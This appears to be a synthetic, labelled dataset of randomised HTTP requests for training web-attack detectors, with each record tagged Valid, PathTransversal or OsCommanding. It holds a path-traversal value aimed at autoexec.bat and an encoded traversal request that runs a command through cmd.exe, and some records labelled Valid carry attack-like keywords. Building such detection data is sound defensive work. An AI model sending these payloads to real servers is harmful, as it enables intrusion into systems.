If-Match: "-9KSpiXHE1w4IgD"
If-None-Match: "ywLlEsf7iuWi62FCnxR"
If-Range: *
Max-Forwards: 3589
MIME-Version: 2.3
Pragma: enTl1i='s'
Proxy-Authorization: NTLM Y2lvaW1lMUVha2Eyb3h3bnRvbWFsZTdleGR5aHIwdG92cg==
Authorization: Basic dGVvOWhhdFE6OHNxZHJoag==
Referer: http://nsXtpzl.com/7rodlo/axmtgmhS.aspx
TE: trailers,deflate
Trailer: Range
User-Agent: dTimsfbjdc/8.9
UA-CPU: Sparc
UA-Disp: 2042,3575,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 885x378
Via: HTTP/0.7 88.0.87.2
Transfer-Encoding: zoOna
Upgrade: Eenon/2.5, 5enne/0.8
Warning: 428 229.86.248.151 "4fbuiivernor" 
X-Forwarded-For: 21.115.124.16
----: --------------------------

xgjkonnlzd=aIHF&rdtzbuu=xqCgs&8Ter=rairhIdTa&ndj3nhtriee=eE&1ndEyYY=ri?49 &ryrm6tyzdftioVg=9'e&sinf9ioltef8tce=83&eAyYMqb6DC=ieth9&UKRLsQyD5=eh&sIsRshtl=t5\h n9connect&3oseiatjme9yht3=mhsni?&Neew=15780952&aapsesOt2l=4046

End - Id: 42759
Start - Id: 18509
class: Valid
GET /ry0_52l_MD5tYTlMmO/y.nIEWnFtHwuxb/dRAvU/aGCD5drOIQDcbHsAAZ0C/upXHsZFQxFZj/iVKyW2eec3Nu/cC@jror1gVKB/qOV65QA/AG/piFQzaHBKGdANj/oclht/wvc76tYjweih.jpeg?ZpQ.Yj7vV=etL8omse%27ic&a0indhY8=aeybe&ceenifoisyrst=csnnAniut HTTP/1.1
Host: www.oeXtszecwa.st
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.7, iso-10646-ucs-2;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 22.132.39.27
Cookie: La7tNieci=o9n9pcDKk;3arws2qdd=19123;eoSeieeoyhj=ee1;jY2WO_T=78108742;rccnofhmlce8=79441732
Cookie2: $Version="098"
Date: Tue, 02 May 06 08:01:18 UTC
ETag: W/"Iwq_AF5oIHbdgL1"
Expect: eumwO4l=ltssvua;aeslNi8
From: Titeo@tuuSdemun.uk
If-Modified-Since: Mon, 30 Oct 06 24:21:49 UTC
If-Unmodified-Since: Sun, 28 Jun 09 20:37:19 UTC
If-Match: "rJdeI.tMoW6QNVvGE"
If-None-Match: "gBlTknLK6Pns1dD"
If-Range: *
Max-Forwards: 804
MIME-Version: 2.2
Pragma: n70U=7lowmt
Proxy-Authorization: Digest cnonce="3jshnz"
Authorization: Basic c2Vzbmh1Z3Q6cjRmYXo=
Range: 29051-71
Referer: /raav/i4ht92a.mpeg
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: a4i216U http://www.irsf.gov
UA-CPU: 68000
UA-Disp: 973,9699,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 376x4288
Via: HTTP/9.4 247.116.245.161, 9.3 www.xoeet.shtml, HTTP/1.1 www.csagnhs.shtml
Transfer-Encoding: gzip
Upgrade: tlAedr/6.6, ae8or/3.2, l0c2rn/3.3, t3stse/1.9
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 142489460894
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 18509
Start - Id: 45808
class: PathTransversal
GET /s_W_XytHLCHaCBYBGT9/oZ.BeHpd4cY7L/tsgoonegr0eefSv/Lb2F9joqfF@/aSettln2as.css?pli41aibHi4te=nnfia&tq5=eddwsiache&sctu7aeou8=lcdrfRonciM&luiemarrl=r+nsao&aetrn=g%3A%5Cautoexec.bat&adefelzm3R=%5Bn6g&Irekhg=4 HTTP/1.1
Host: 201.134.243.182:24412
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.4, deflate, identity;q=0.7
Accept-Language: Tske8ia-i, 2nz-triczd;q=0.2, r-rbwo;q=0.0, e-sf8grer;q=0.8, r-n
Cache-Control: no-cache
Client-ip: 241.101.131.168
Cookie: 7Auonid9e=550103;ce8=4448;SwF8=ew:e;oXuxaooobad=79;alsosdttrkds=2;Oehzsseeyeo=sgXsoeiti6etndw
Cookie2: $Version="085"
Date: Wed, 21 Mar 07 08:36:47 CET
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: zoar1s@QodPtn.cz
If-Modified-Since: Sat, 12 May 07 06:31:06 GMT
If-Unmodified-Since: Sat, 30 Jan 10 21:02:28 CET
If-Match: "F-9ztL_jB_iUC_D8"
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: Thu, 13 Mar 08 24:28:32 GMT
Max-Forwards: 03
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Basic bnQ0bTU6ZWlzb2g2bg==
Range: 10-894039
Referer: /einnW/TIiAfsi/djeos.mdb
TE: trailers,chunked,chunked
Trailer: Authorization
User-Agent: Mozilla/5.8 (Windows; U; WinNT 2.2; ok-rt; rv:1.6.5) Gecko/89246014
UA-CPU: PowerPC
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9422x259
Via: 8.9 www.oa18qena.htm, 0.9 58.13.223.27, crnAhk/8.8 www.vsainsi.gif
Transfer-Encoding: compress
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45808
Start - Id: 28980
class: Valid
GET /5teetstfe3uneLsc/er7run/lXH/uuOg/oiNPWPFfyMH/7toesj5yttssAOkkonPh/ru6aOC/t.2TnjW4Mr7Vl.html?faz1a4montWd=hVq6gbpN8oq0&armyesEintreem0=acoAi&7tph=144955347&wa5ctfjlEps=p.mKae27jlYT&G3a7w=38718419&B0documentUxIhxterm=itraevtte7nt&xigvlwansIstj=ujv_%40X5LOI&f6wD4hnctfRtg=u0rsii7e&etnhnr1e4toseI=tinput&dzit4dh2J=4ahriuaacqptft&i_z.7jXR=-Enseg%272pgaL&Whkcisiltdn=4tihtlh1esfndecm&7sbabuwRtr=n5 HTTP/1.0
Host: 101.134.48.249
Connection: close
Accept: application/postscript, application/*, image/*
Accept-Charset: x-mac-turkish;q=0.2
Accept-Encoding: compress;q=0.7, identity, compress;q=0.2
Accept-Language: 7dBrcS-9vnsr, brs-dl, daw-hjg;q=0.4, mslaa2-c
Cache-Control: no-transform
Client-ip: 15.156.44.232
Cookie: eH5FzJl=8800;3rsiafyaM2legE0=2
Cookie2: $Version="113"
Date: Thu, 01 Sep 05 24:27:52 UTC
ETag: "6W6lizwmf3Sl4Tos"
Expect: steenge
From: zatnI@tsoae.gov
If-Modified-Since: Wed, 24 Dec 08 23:40:58 UTC
If-Unmodified-Since: Sat, 17 Sep 05 09:45:25 GMT
If-Match: *
If-None-Match: "LYAnWwOj23s4FTPYCc"
If-Range: *
Max-Forwards: 725
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic MW0ydzphaWR1cg==
Range: -48236,695-,-4
Referer: /oersenv/mimAh/olnlEso8/i8wal.doc
TE: chunked;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/4.6 (X11; U; Linux i586 8.7; ai-i4; rv:8.3.9) Gecko/49698888
UA-CPU: Sparc
UA-Disp: 7483,031,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1053x1221
Via: 4.6 www.ruTislH.html
Transfer-Encoding: deflate
Upgrade: W9cH/4.8, tlo/3.6, osrpo/7.5, hDTh/5.0, 4Lotcm/6.0
Warning: 933 218.51.171.88 "9Avloejndo0s" "Fri, 12 Jun 09 21:49:35 GMT"
X-Forwarded-For: 175.191.83.87
X-Serial-Number: 055751373307057
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28980
Start - Id: 31724
class: Valid
GET /eBRO./eya/LjlMPRwAxnQuxF/HdQ5j2A6u/0T49aefteaXtnroznliy/nEVmh3so.js?tfhgc4ao=iulink%2BandTbhIola&mh8mtt=tIrishdIhhe56e HTTP/1.1
Host: 201.165.221.79:13
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: max-stale=2915
Client-ip: 194.242.237.128
Cookie: @YyQ=artat;htenrso=63;lNjrgsrl=hmsr
Cookie2: $Version="3"
Date: Thu, 13 Sep 07 21:12:43 GMT
ETag: "A.FfYo7@-.fTy4ET.e"
Expect: 100-continue
From: rKtsre@uhAOD.com
If-Modified-Since: Sun, 05 Aug 07 04:33:59 UTC
If-Unmodified-Since: Thu, 17 Feb 05 18:13:27 CET
If-Match: "ujwj1D6BeIt71p6Pan"
If-None-Match: *
If-Range: Mon, 06 Dec 04 13:16:27 GMT
Max-Forwards: 269
MIME-Version: 5.0
Pragma: srs7Efe=ekqia
Proxy-Authorization: tdsc jhdhva=erfp
Authorization: NTLM YnJ0dDVhcHR0bm9lYWEyaWFibmlhOWhuaGxucFJqT2lwZ2RuZTluYWdEaWJu
Range: -062,-681156,198-
Referer: http://www.tenvi.cz/0ptTGgc/dnuoeIya.rar
TE: trailers,gzip;q=0.5,chunked
Trailer: If-Range
User-Agent: eizweknFb (rjzhQXiUHp; wx73NaGuP; cuiQ-J1q; o-Gwqm)
UA-CPU: Sparc
UA-Disp: 574,324,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 751x460
Via: 0tsn8r/0.7 49.192.94.60
Transfer-Encoding: gzip
Upgrade: onseb/6.6, l4i/3.8
Warning: 582 63.98.99.8 "lare9ilntstaLhew" "Tue, 29 Nov 05 02:58:50 UTC"
X-Forwarded-For: 84.104.88.36
X-Serial-Number: 48619214669
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31724
Start - Id: 9855
class: Valid
GET /MF.Qafes5/ceeuh0m9aeyke4og4sen/fa/oak/gHrQs-/eg2_Qg3Lr/Eirr4atstdhtro7l6oh.js?uxsaco4=6&xn7kfe=tHuwnS&elit=tFo8S2o&sispdrse1=6&saii0oh5kMirhs=7484105&hcyeaiuieuhleM7=ls&iepaxZ=ibcaxtermwcat&Tyo3Iuq=gh5e0&TctUn2yts7=9 HTTP/1.1
Host: 114.216.249.78
Connection: keep-alive
Accept: image/*, application/rtf;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 92.47.175.223
Cookie: znhhrejrepwdot=947;VRZEVsrcp4=6weform2 nl;fn=015
Cookie2: $Version="39"
Date: Mon, 03 Oct 05 07:28:52 CET
ETag: W/"-@51lHPVg3LcenR3M6."
Expect: satevs=iaeudWh;t9isT
From: eysn4@teOuatxl.org
If-Modified-Since: Mon, 15 Oct 07 17:03:54 CET
If-Unmodified-Since: Sat, 13 Mar 10 06:03:06 GMT
If-Match: "8w_QWhcoK44kwXZ"
If-None-Match: *
If-Range: Wed, 18 Mar 09 12:39:31 UTC
Max-Forwards: 34
MIME-Version: 1.8
Pragma: 0=90nawE
Proxy-Authorization: Basic aXMwZW5ibmU6ZW9pZWhnNA==
Authorization: NTLM aW91dHJ1ZGhzcmN5c2NybjJzZWFjek95b3FzYmlvbjZlc2VpbGptbmd0aUFhYmU=
Range: -116,600-315,197733-5
Referer: /vrhs/FeeTiece.mdb
TE: gzip;q=0.8,trailers,trailers
Trailer: If-None-Match
User-Agent: o0-sMQM http://www.rihs3e.com
UA-CPU: MIPS
UA-Disp: 1962,9364,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 803x940
Via: le1td/3.0 www.inRtl.gif, 1.1 223.200.87.231, 5.5 www.dndhen.jpg
Transfer-Encoding: compress
Upgrade: dsi/0.4
Warning: 359 www.omvimkcn.html "tdHnehjio" 
X-Forwarded-For: 148.39.4.192
X-Serial-Number: 09946739061718
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9855
Start - Id: 13758
class: Valid
GET /fJl9PI5vzqwVZkRWh/mH1R/ii/yenio/5.div/txo2IO1WYx@BYKzll/rXxs/e-2_QCnXAs0wbhv/W48tvipasswdGSAKftpexecp.php3?ubVEOo7=N%40v&wFxmlQu.wp--execi=dtt%7E%7E+yh%3Ba HTTP/1.1
Host: www.aulRascv.org
Connection: eUosn
Accept: text/*, audio/basic;q=0.7
Accept-Charset: iso-8859-2;q=0.0, cp-950
Accept-Encoding: 
Accept-Language: q-dyut1t
Cache-Control: tB='rrdu'
Client-ip: 58.102.229.56
Cookie: ojaEhiis=sd;benmils=39355090
Cookie2: $Version="9"
Date: Mon, 21 Aug 06 13:17:47 UTC
ETag: "vDGVu79jEDu_3Ih"
Expect: zrev
From: gnhB9o@rfci.com
If-Modified-Since: Sat, 10 Mar 07 20:32:06 UTC
If-Unmodified-Since: Sat, 26 Mar 05 11:27:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Jul 05 03:57:46 GMT
Max-Forwards: 31
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWk2NWE0YTpzdG9tZTJodA==
Authorization: Digest algorithm=ac7siaiC
Range: 11-,904144-8
Referer: /utAo/fnrcef/egm9/iC8eLS/q0hrorht.nsf
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Wrzstp/1.8.5.8
UA-CPU: PowerPC
UA-Disp: 173,9492,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x597
Via: esrho/2.8 107.196.37.132:0
Transfer-Encoding: deflate
Upgrade: 4tkn/9.7, fa3eis/5.5
Warning: 820 www.uproeo.htm "Ianeee" 
X-Forwarded-For: 52.127.152.38
X-Serial-Number: 26172268
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13758
Start - Id: 13430
class: Valid
GET /.6p/IhoahpntqhDravc/cqe@T-U2/tao1osnTreE/uW/rx/mWGUshutdown@Y/cMqd4cgFpcGPP8OsN6M.png?ei7tIeh0wlhl=n+gcb&Yq61YC=199629 HTTP/1.1
Host: www.wisdNieee.st
Connection: keep-alive
Accept: video/*, video/*;q=0.4, audio/basic
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 148.219.86.208
Cookie: a8geeloN35anoMi=eo;USYJhN6Rwinntid3=1uh_-T9Rq;ehOmndtlvaba=eiE4mosuevalwinnt>e
Cookie2: $Version="124"
Date: Thu, 31 Mar 05 04:42:43 GMT
ETag: W/"cAVI@vuiXnK-wTp8"
Expect: 2sdsenn=6tnND;csk5=8r2hmss
From: mofh@F9slaieWr.com
If-Modified-Since: Fri, 24 Mar 06 07:44:23 GMT
If-Unmodified-Since: Mon, 29 Mar 10 16:59:19 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 21 Apr 09 21:34:39 CET
Max-Forwards: 640
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM bXBlaHQ4M3BoZWF4ZmVlYnBlN2FhRUUzc250dzUwaWVxZTBycm8ybGlzZjBB
Range: 7322-
Referer: http://1dsd.cz/seyno.fgf
TE: gzip;q=0.7,deflate
Trailer: If-None-Match
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 6.8; rw-pe; rv:1.9.9) Gecko/70131868
UA-CPU: x86
UA-Disp: 507,141,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 661x4416
Via: rI0fn/2.0 233.149.71.132, HTTP/3.6 167.220.247.119
Transfer-Encoding: identity
Upgrade: 9ItrTa/4.9, sege/5.6
Warning: 040 www.md2Oee7.html "8eDFiNdsrzhsqhjpn7d" 
X-Forwarded-For: 220.88.204.10
X-Serial-Number: 8913868514720115974
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13430
Start - Id: 44474
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.aceocTAo3a.gov
Connection: tdydun
Accept: text/xml, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: reer-hutnhr;q=0.9, km-na, nc-wxfl0aj;q=0.8, 6yoza-iodin;q=0.5
Cache-Control: no-transform
Client-ip: 1.111.16.222
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="38"
Date: Tue, 02 Mar 10 19:04:48 UTC
ETag: "W15-SZeMZOC6UIv"
Expect: nets=rpaui;afeisve8=e88t
From: bniw@mamjmaT.net
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Fri, 25 Jul 08 13:35:25 GMT
If-Match: *
If-None-Match: "G3i8kwl2xodSAkFP"
If-Range: *
Max-Forwards: 286
MIME-Version: 3.4
Pragma: 7pYecmhh='arng'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Basic dHJsbjpoMnJuNmF5bg==
Range: 6-02287,72753-
Referer: http://www.recassrr.gov/nu8nsQ.php
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: tPnaeetbs
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4559x569
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: gzip
Upgrade: tpEs/3.5, ser/9.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 73463
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44474
Start - Id: 23141
class: Valid
GET /.nA0UA5/eweqmtt1bvebsal/oeatnoce.mdb?XOygpBcQ=h%25st&Nbspdv_NW=%26+tynbuoihcsock_stream HTTP/1.0
Host: 221.240.110.181
Connection: ftheydI
Accept: text/plain, video/quicktime;q=0.2, audio/x-wav;q=0.8
Accept-Charset: windows-1250;q=0.6, iso-10646-ucs-2;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=09052
Client-ip: 45.220.19.60
Cookie: .vM6v0Lcmdkb3=vRlql@44Dsf;rt=eeLl
Cookie2: $Version="691"
Date: Sat, 22 Apr 06 04:16:03 GMT
ETag: "mAD_tK05Ofy99zBo"
Expect: 100-continue
From: xtisieil@oihdn.cz
If-Modified-Since: Fri, 03 Mar 06 02:52:55 GMT
If-Unmodified-Since: Thu, 03 Jul 08 17:08:02 CET
If-Match: *
If-None-Match: "Z5Dq-7GwLLabwO3ru"
If-Range: Mon, 10 Aug 09 15:24:05 CET
Max-Forwards: 646
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM c25ycGE0bGVpRW9vMmRPZWFjczJFMGg2M2hlOG14RXJ0cmZvdA==
Range: 566-769965,-745
Referer: /eetsneE.gif
TE: trailers
Trailer: Referer
User-Agent: luiLerahsi/8.1.5.3
UA-CPU: MIPS
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 558x894
Via: FTP/0.5 www.Eqvhn1m.htm:68301, 8.4 154.173.58.214, HTTP/4.9 175.80.136.133
Transfer-Encoding: identity
Upgrade: 1tc/8.5, saair/2.1, so6/1.5, uuaZi/5.6, n0di/4.9
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23141
Start - Id: 6278
class: Valid
POST /t8lgXQEDShvMjlGTUwC/gKlcp5XudFSCd3lk/sSopenLp1D/riCPMcK6q0riJABVr17/ynennmooh3R67m/33m@JveDPaPEWMPJHDG-/lleii6rcendne/kUd3YU3/a4S-sfc63dq4rAafoQ.msf? HTTP/1.1
Content-Length: 189
Content-Language: Bsti,8
Content-Encoding: deflate
Content-Location: http://estA.fr/ikxto/ehENh/9xorYas/yscel/Rohy0kE.gif
Content-MD5: bnViNHNoZWFoaGV0cGFDeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Jun 05 11:11:24 GMT
Last-Modified: Fri, 31 Jul 09 03:34:18 UTC
Host: 21.208.221.21:1025
Connection: ywencsw
Accept: application/rtf;q=0.3, video/*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 31.168.203.57
Cookie: u7ieclcHur=servicesuen@naallsamhallhtaccesen;dhxe=aA@ fu2ix6lewr;ry=836;ctx0rexxcF7=crcxouqoolti;hoo=rtp1hci1p
Cookie2: $Version="297"
Date: Mon, 04 Feb 08 15:38:49 CET
ETag: W/"@c68p_R1HCDtNdj4k0jx"
Expect: em4e9i4n=fhos
From: f4ts@eyoenodn.cz
If-Modified-Since: Thu, 20 Sep 07 20:09:09 GMT
If-Unmodified-Since: Fri, 30 Apr 04 10:53:53 GMT
If-Match: "44TtCrGHjyNhCK8yPhm"
If-None-Match: *
If-Range: "svmaxQQ0-hdI-nueUdy"
Max-Forwards: 77
MIME-Version: 1.5
Pragma: Ws3te4i='cuov'
Proxy-Authorization: Basic ZGlpcm1uc3Q6eG5zaGxtaA==
Authorization: Digest nonce
Range: 31074-7605
Referer: /hmh0/aaEtZt7/tnsrg/owoa.nsf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: stseodret
UA-CPU: 68000
UA-Disp: 0466,020,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6564x871
Via: HTTP/3.0 95.168.223.68, HTTP/3.7 18.75.20.89, 2.8 4.187.99.146
Transfer-Encoding: gzip
Upgrade: ra0Hnd/6.8, eyae/3.6, Irhtn/4.9, eltrm/8.5, ilhi/1.9
Warning: 097 84.156.203.77 "rilteriyvagst2t" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 9542646613445
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

en=htid&oooudT0St2Asytb= sfyf<%n1r7?r&lC.boot.iniEzX9d73H=17hls&AeoaRterMgwo0t=6ybpCxkB&brt4QtupdateW=T&xvRDc83N=b.gFKQlW&B3pmochalinkc= n&dn=0723&a4uotUl=Etn&a6g8cel=aa&bzhmB0o=5phow

End - Id: 6278
Start - Id: 8980
class: Valid
GET /oaceawnimt/nccMCmoNi8-I.asmx?aawhdqestor=Oe%7CK%25ncnaaoane+o%3DR&nmj=sfJ&gieteilks=aMn7rahs0ne&wn4r=a%40daibpalS&Ltsctsuibin=oerrce&spsesElfonlgo=0&LconnectincH.NE2dja=304853&aeeh8rorer44bt=02723&amanaOiaxt=06017389&rko3wsn6h=3rHehr0&S9uJdrop4cbstylevCo=An&mocanmkrcsore=tC HTTP/1.0
Host: 24.243.189.205
Connection: keep-alive
Accept: image/gif;q=0.1, video/*, audio/basic
Accept-Charset: utf-8;q=0.4, windows-1255;q=0.3, iso-8859-4, iso-8859-3
Accept-Encoding: gzip;q=0.2, identity;q=0.5, deflate, deflate;q=0.0, deflate
Accept-Language: *
Cache-Control: min-fresh=1075
Client-ip: 212.9.148.144
Cookie: uitOaei4eesmta=-p uc;yWcren=nuwnph-zraai;]menmd
Cookie2: $Version="46"
Date: Mon, 18 Jul 05 02:00:30 UTC
ETag: "gbPWK1wVdagq7DDZ5"
Expect: litUui
From: etedlri@oanesz.de
If-Modified-Since: Thu, 21 Jan 10 14:30:50 CET
If-Unmodified-Since: Sat, 07 Feb 09 19:30:15 CET
If-Match: "Vae0RuAoiMl7mzl"
If-None-Match: *
If-Range: Fri, 31 Dec 04 21:35:57 CET
Max-Forwards: 8
MIME-Version: 5.3
Pragma: ftEls='vekiar6'
Proxy-Authorization: NTLM aVNlaG5pMHVsMWlldWVzdGRsb2F2Y290SkNlc3RTNGVUcm8zOGk3bWlob1dBcg==
Authorization: Digest qop=3lbszln
Range: 698556-9033
Referer: http://www.iunha1js.uk/tnEVhaq/TAisj0/wb6w.mspx
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.3 (compatible; sidedo2; Win98; msdgotstde; 6iyba8we; oCyod)
UA-CPU: PowerPC
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7350x9086
Via: Hgbms/9.3 www.i3goAtlT.gif
Transfer-Encoding: gzip
Upgrade: acE/5.6, p1t/4.0, nae/0.1, xpcsn/9.0, aeaat/1.8
Warning: 247 www.nekn6rAe.htm "a78cpakr" "Tue, 30 Jan 07 10:22:39 CET"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 92954758156
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8980
Start - Id: 5021
class: Valid
POST /gsxEfdteypdoraoaa/xkn/mRezTuIaPIWh/dt/mrluepe.htm? HTTP/1.0
Content-Length: 95
Content-Language: nra,ifel0tj
Content-Encoding: deflate
Content-Location: /ohairsc/nEIonhq/dfim/Oeytq.swf
Content-MD5: bHJJZXRhaGhpaWR0dG9lYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Apr 04 21:33:51 GMT
Last-Modified: Mon, 19 Feb 07 20:57:16 GMT
Host: 226.1.149.145:48248
Connection: close
Accept: application/*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=96540
Client-ip: 162.231.248.117
Cookie: E@l-3ESoIRTM=rprvu9tHaaue
Cookie2: $Version="23"
Date: Thu, 05 Nov 09 03:50:16 CET
ETag: "I7MGgHbUxda9tdAq.M@x"
Expect: rjidLy=lcseE5h
From: anypee@kdrqiteI.it
If-Modified-Since: Tue, 17 Jan 06 22:36:04 GMT
If-Unmodified-Since: Fri, 12 Jun 09 13:49:53 CET
If-Match: "PDBxk8x-Q1fv_hqIiQc"
If-None-Match: *
If-Range: Sat, 07 May 05 03:10:28 UTC
Max-Forwards: 92
MIME-Version: 2.1
Pragma: cYef='spewr'
Proxy-Authorization: NTLM b3lybmFzdHJBcG4wZW50bnNsaGVtZHR3YWZydGllZWxibnJ1dA==
Authorization: Digest realm
Range: -1617,797207-,93795-67
Referer: /3sshd/ntejUt/eipiOeab/imae.exe
TE: deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/1.7 (compatible; MSIE 4.1; Linux i386; ttaxnianh)
UA-CPU: StrongARM
UA-Disp: 5033,2774,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8269x495
Via: 0.8 192.37.25.34:0
Transfer-Encoding: gzip
Upgrade: zcci/6.6, nahgit/2.1, zBd/1.0
Warning: 847 www.cs4tji.gif:1579 "ciCj6llogyAnxa" "Fri, 13 Oct 06 21:39:00 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 03530
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

uIf1iiir=6c 0tsN7b&tqrrhc=y/sdsopt7ueNdRatupiiS&eaeeiE=597153672&tecotnotn=tc7&iemcitoi=40936

End - Id: 5021
Start - Id: 17886
class: Valid
GET /hKfEWDTQcgyZVyt6NaB/hu5@HNnBhlgjLHF/hBbeWLnO3j_DA9/r2iehniebmgT/oPRk/Rscbedtnv/tYzYSC-z9/p4huPBjaEzpbmX8XqTcG/n9-x/xosieenaaae/vMz/hXmewrfyr.shtml?xrp3=5&cdbOej=%29%40&dlroedoruehTant=17290449&HYradhra3bjsIb=t3-TF8areYf HTTP/1.0
Host: www.c7mrsecne.de
Connection: keep-alive
Accept: application/*;q=0.0, audio/*;q=0.3
Accept-Charset: cp-932, cp-936;q=0.1, gb2312, x-mac-arabic;q=0.1, x-mac-greek;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 134.171.238.70
Cookie: 0dp3XKf8=d_2lhSvKX8Az;aYAtelnet=yY8CmDgA5.k
Cookie2: $Version="47"
Date: Fri, 09 Jun 06 15:58:32 GMT
ETag: "bLNGsv_WFsHfUWx1.kz_"
Expect: 100-continue
From: optot@elpngint.biz
If-Modified-Since: Sun, 14 Jan 07 07:13:06 GMT
If-Unmodified-Since: Sun, 25 Mar 07 08:29:23 GMT
If-Match: "NProhep70YgBE6sRjmXB"
If-None-Match: "HPVP1dX5ii9eI82vdDq1"
If-Range: *
Max-Forwards: 04
MIME-Version: 3.8
Pragma: te='vBsmj'
Proxy-Authorization: Digest realm
Authorization: Aerf wexZot=okwho6ts
Range: -7
Referer: /rzOeEe/h2aAE/bashjo.bin
TE: trailers,chunked;q=0.7
Trailer: Connection
User-Agent: 7etlLasgri (aEQafG84xg)
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0136x525
Via: 1.1 22.163.217.31
Transfer-Encoding: identity
Upgrade: Rhati/3.5, utw/4.6, 9reuu/0.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 223.60.103.146
X-Serial-Number: 3494344
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17886
Start - Id: 18650
class: Valid
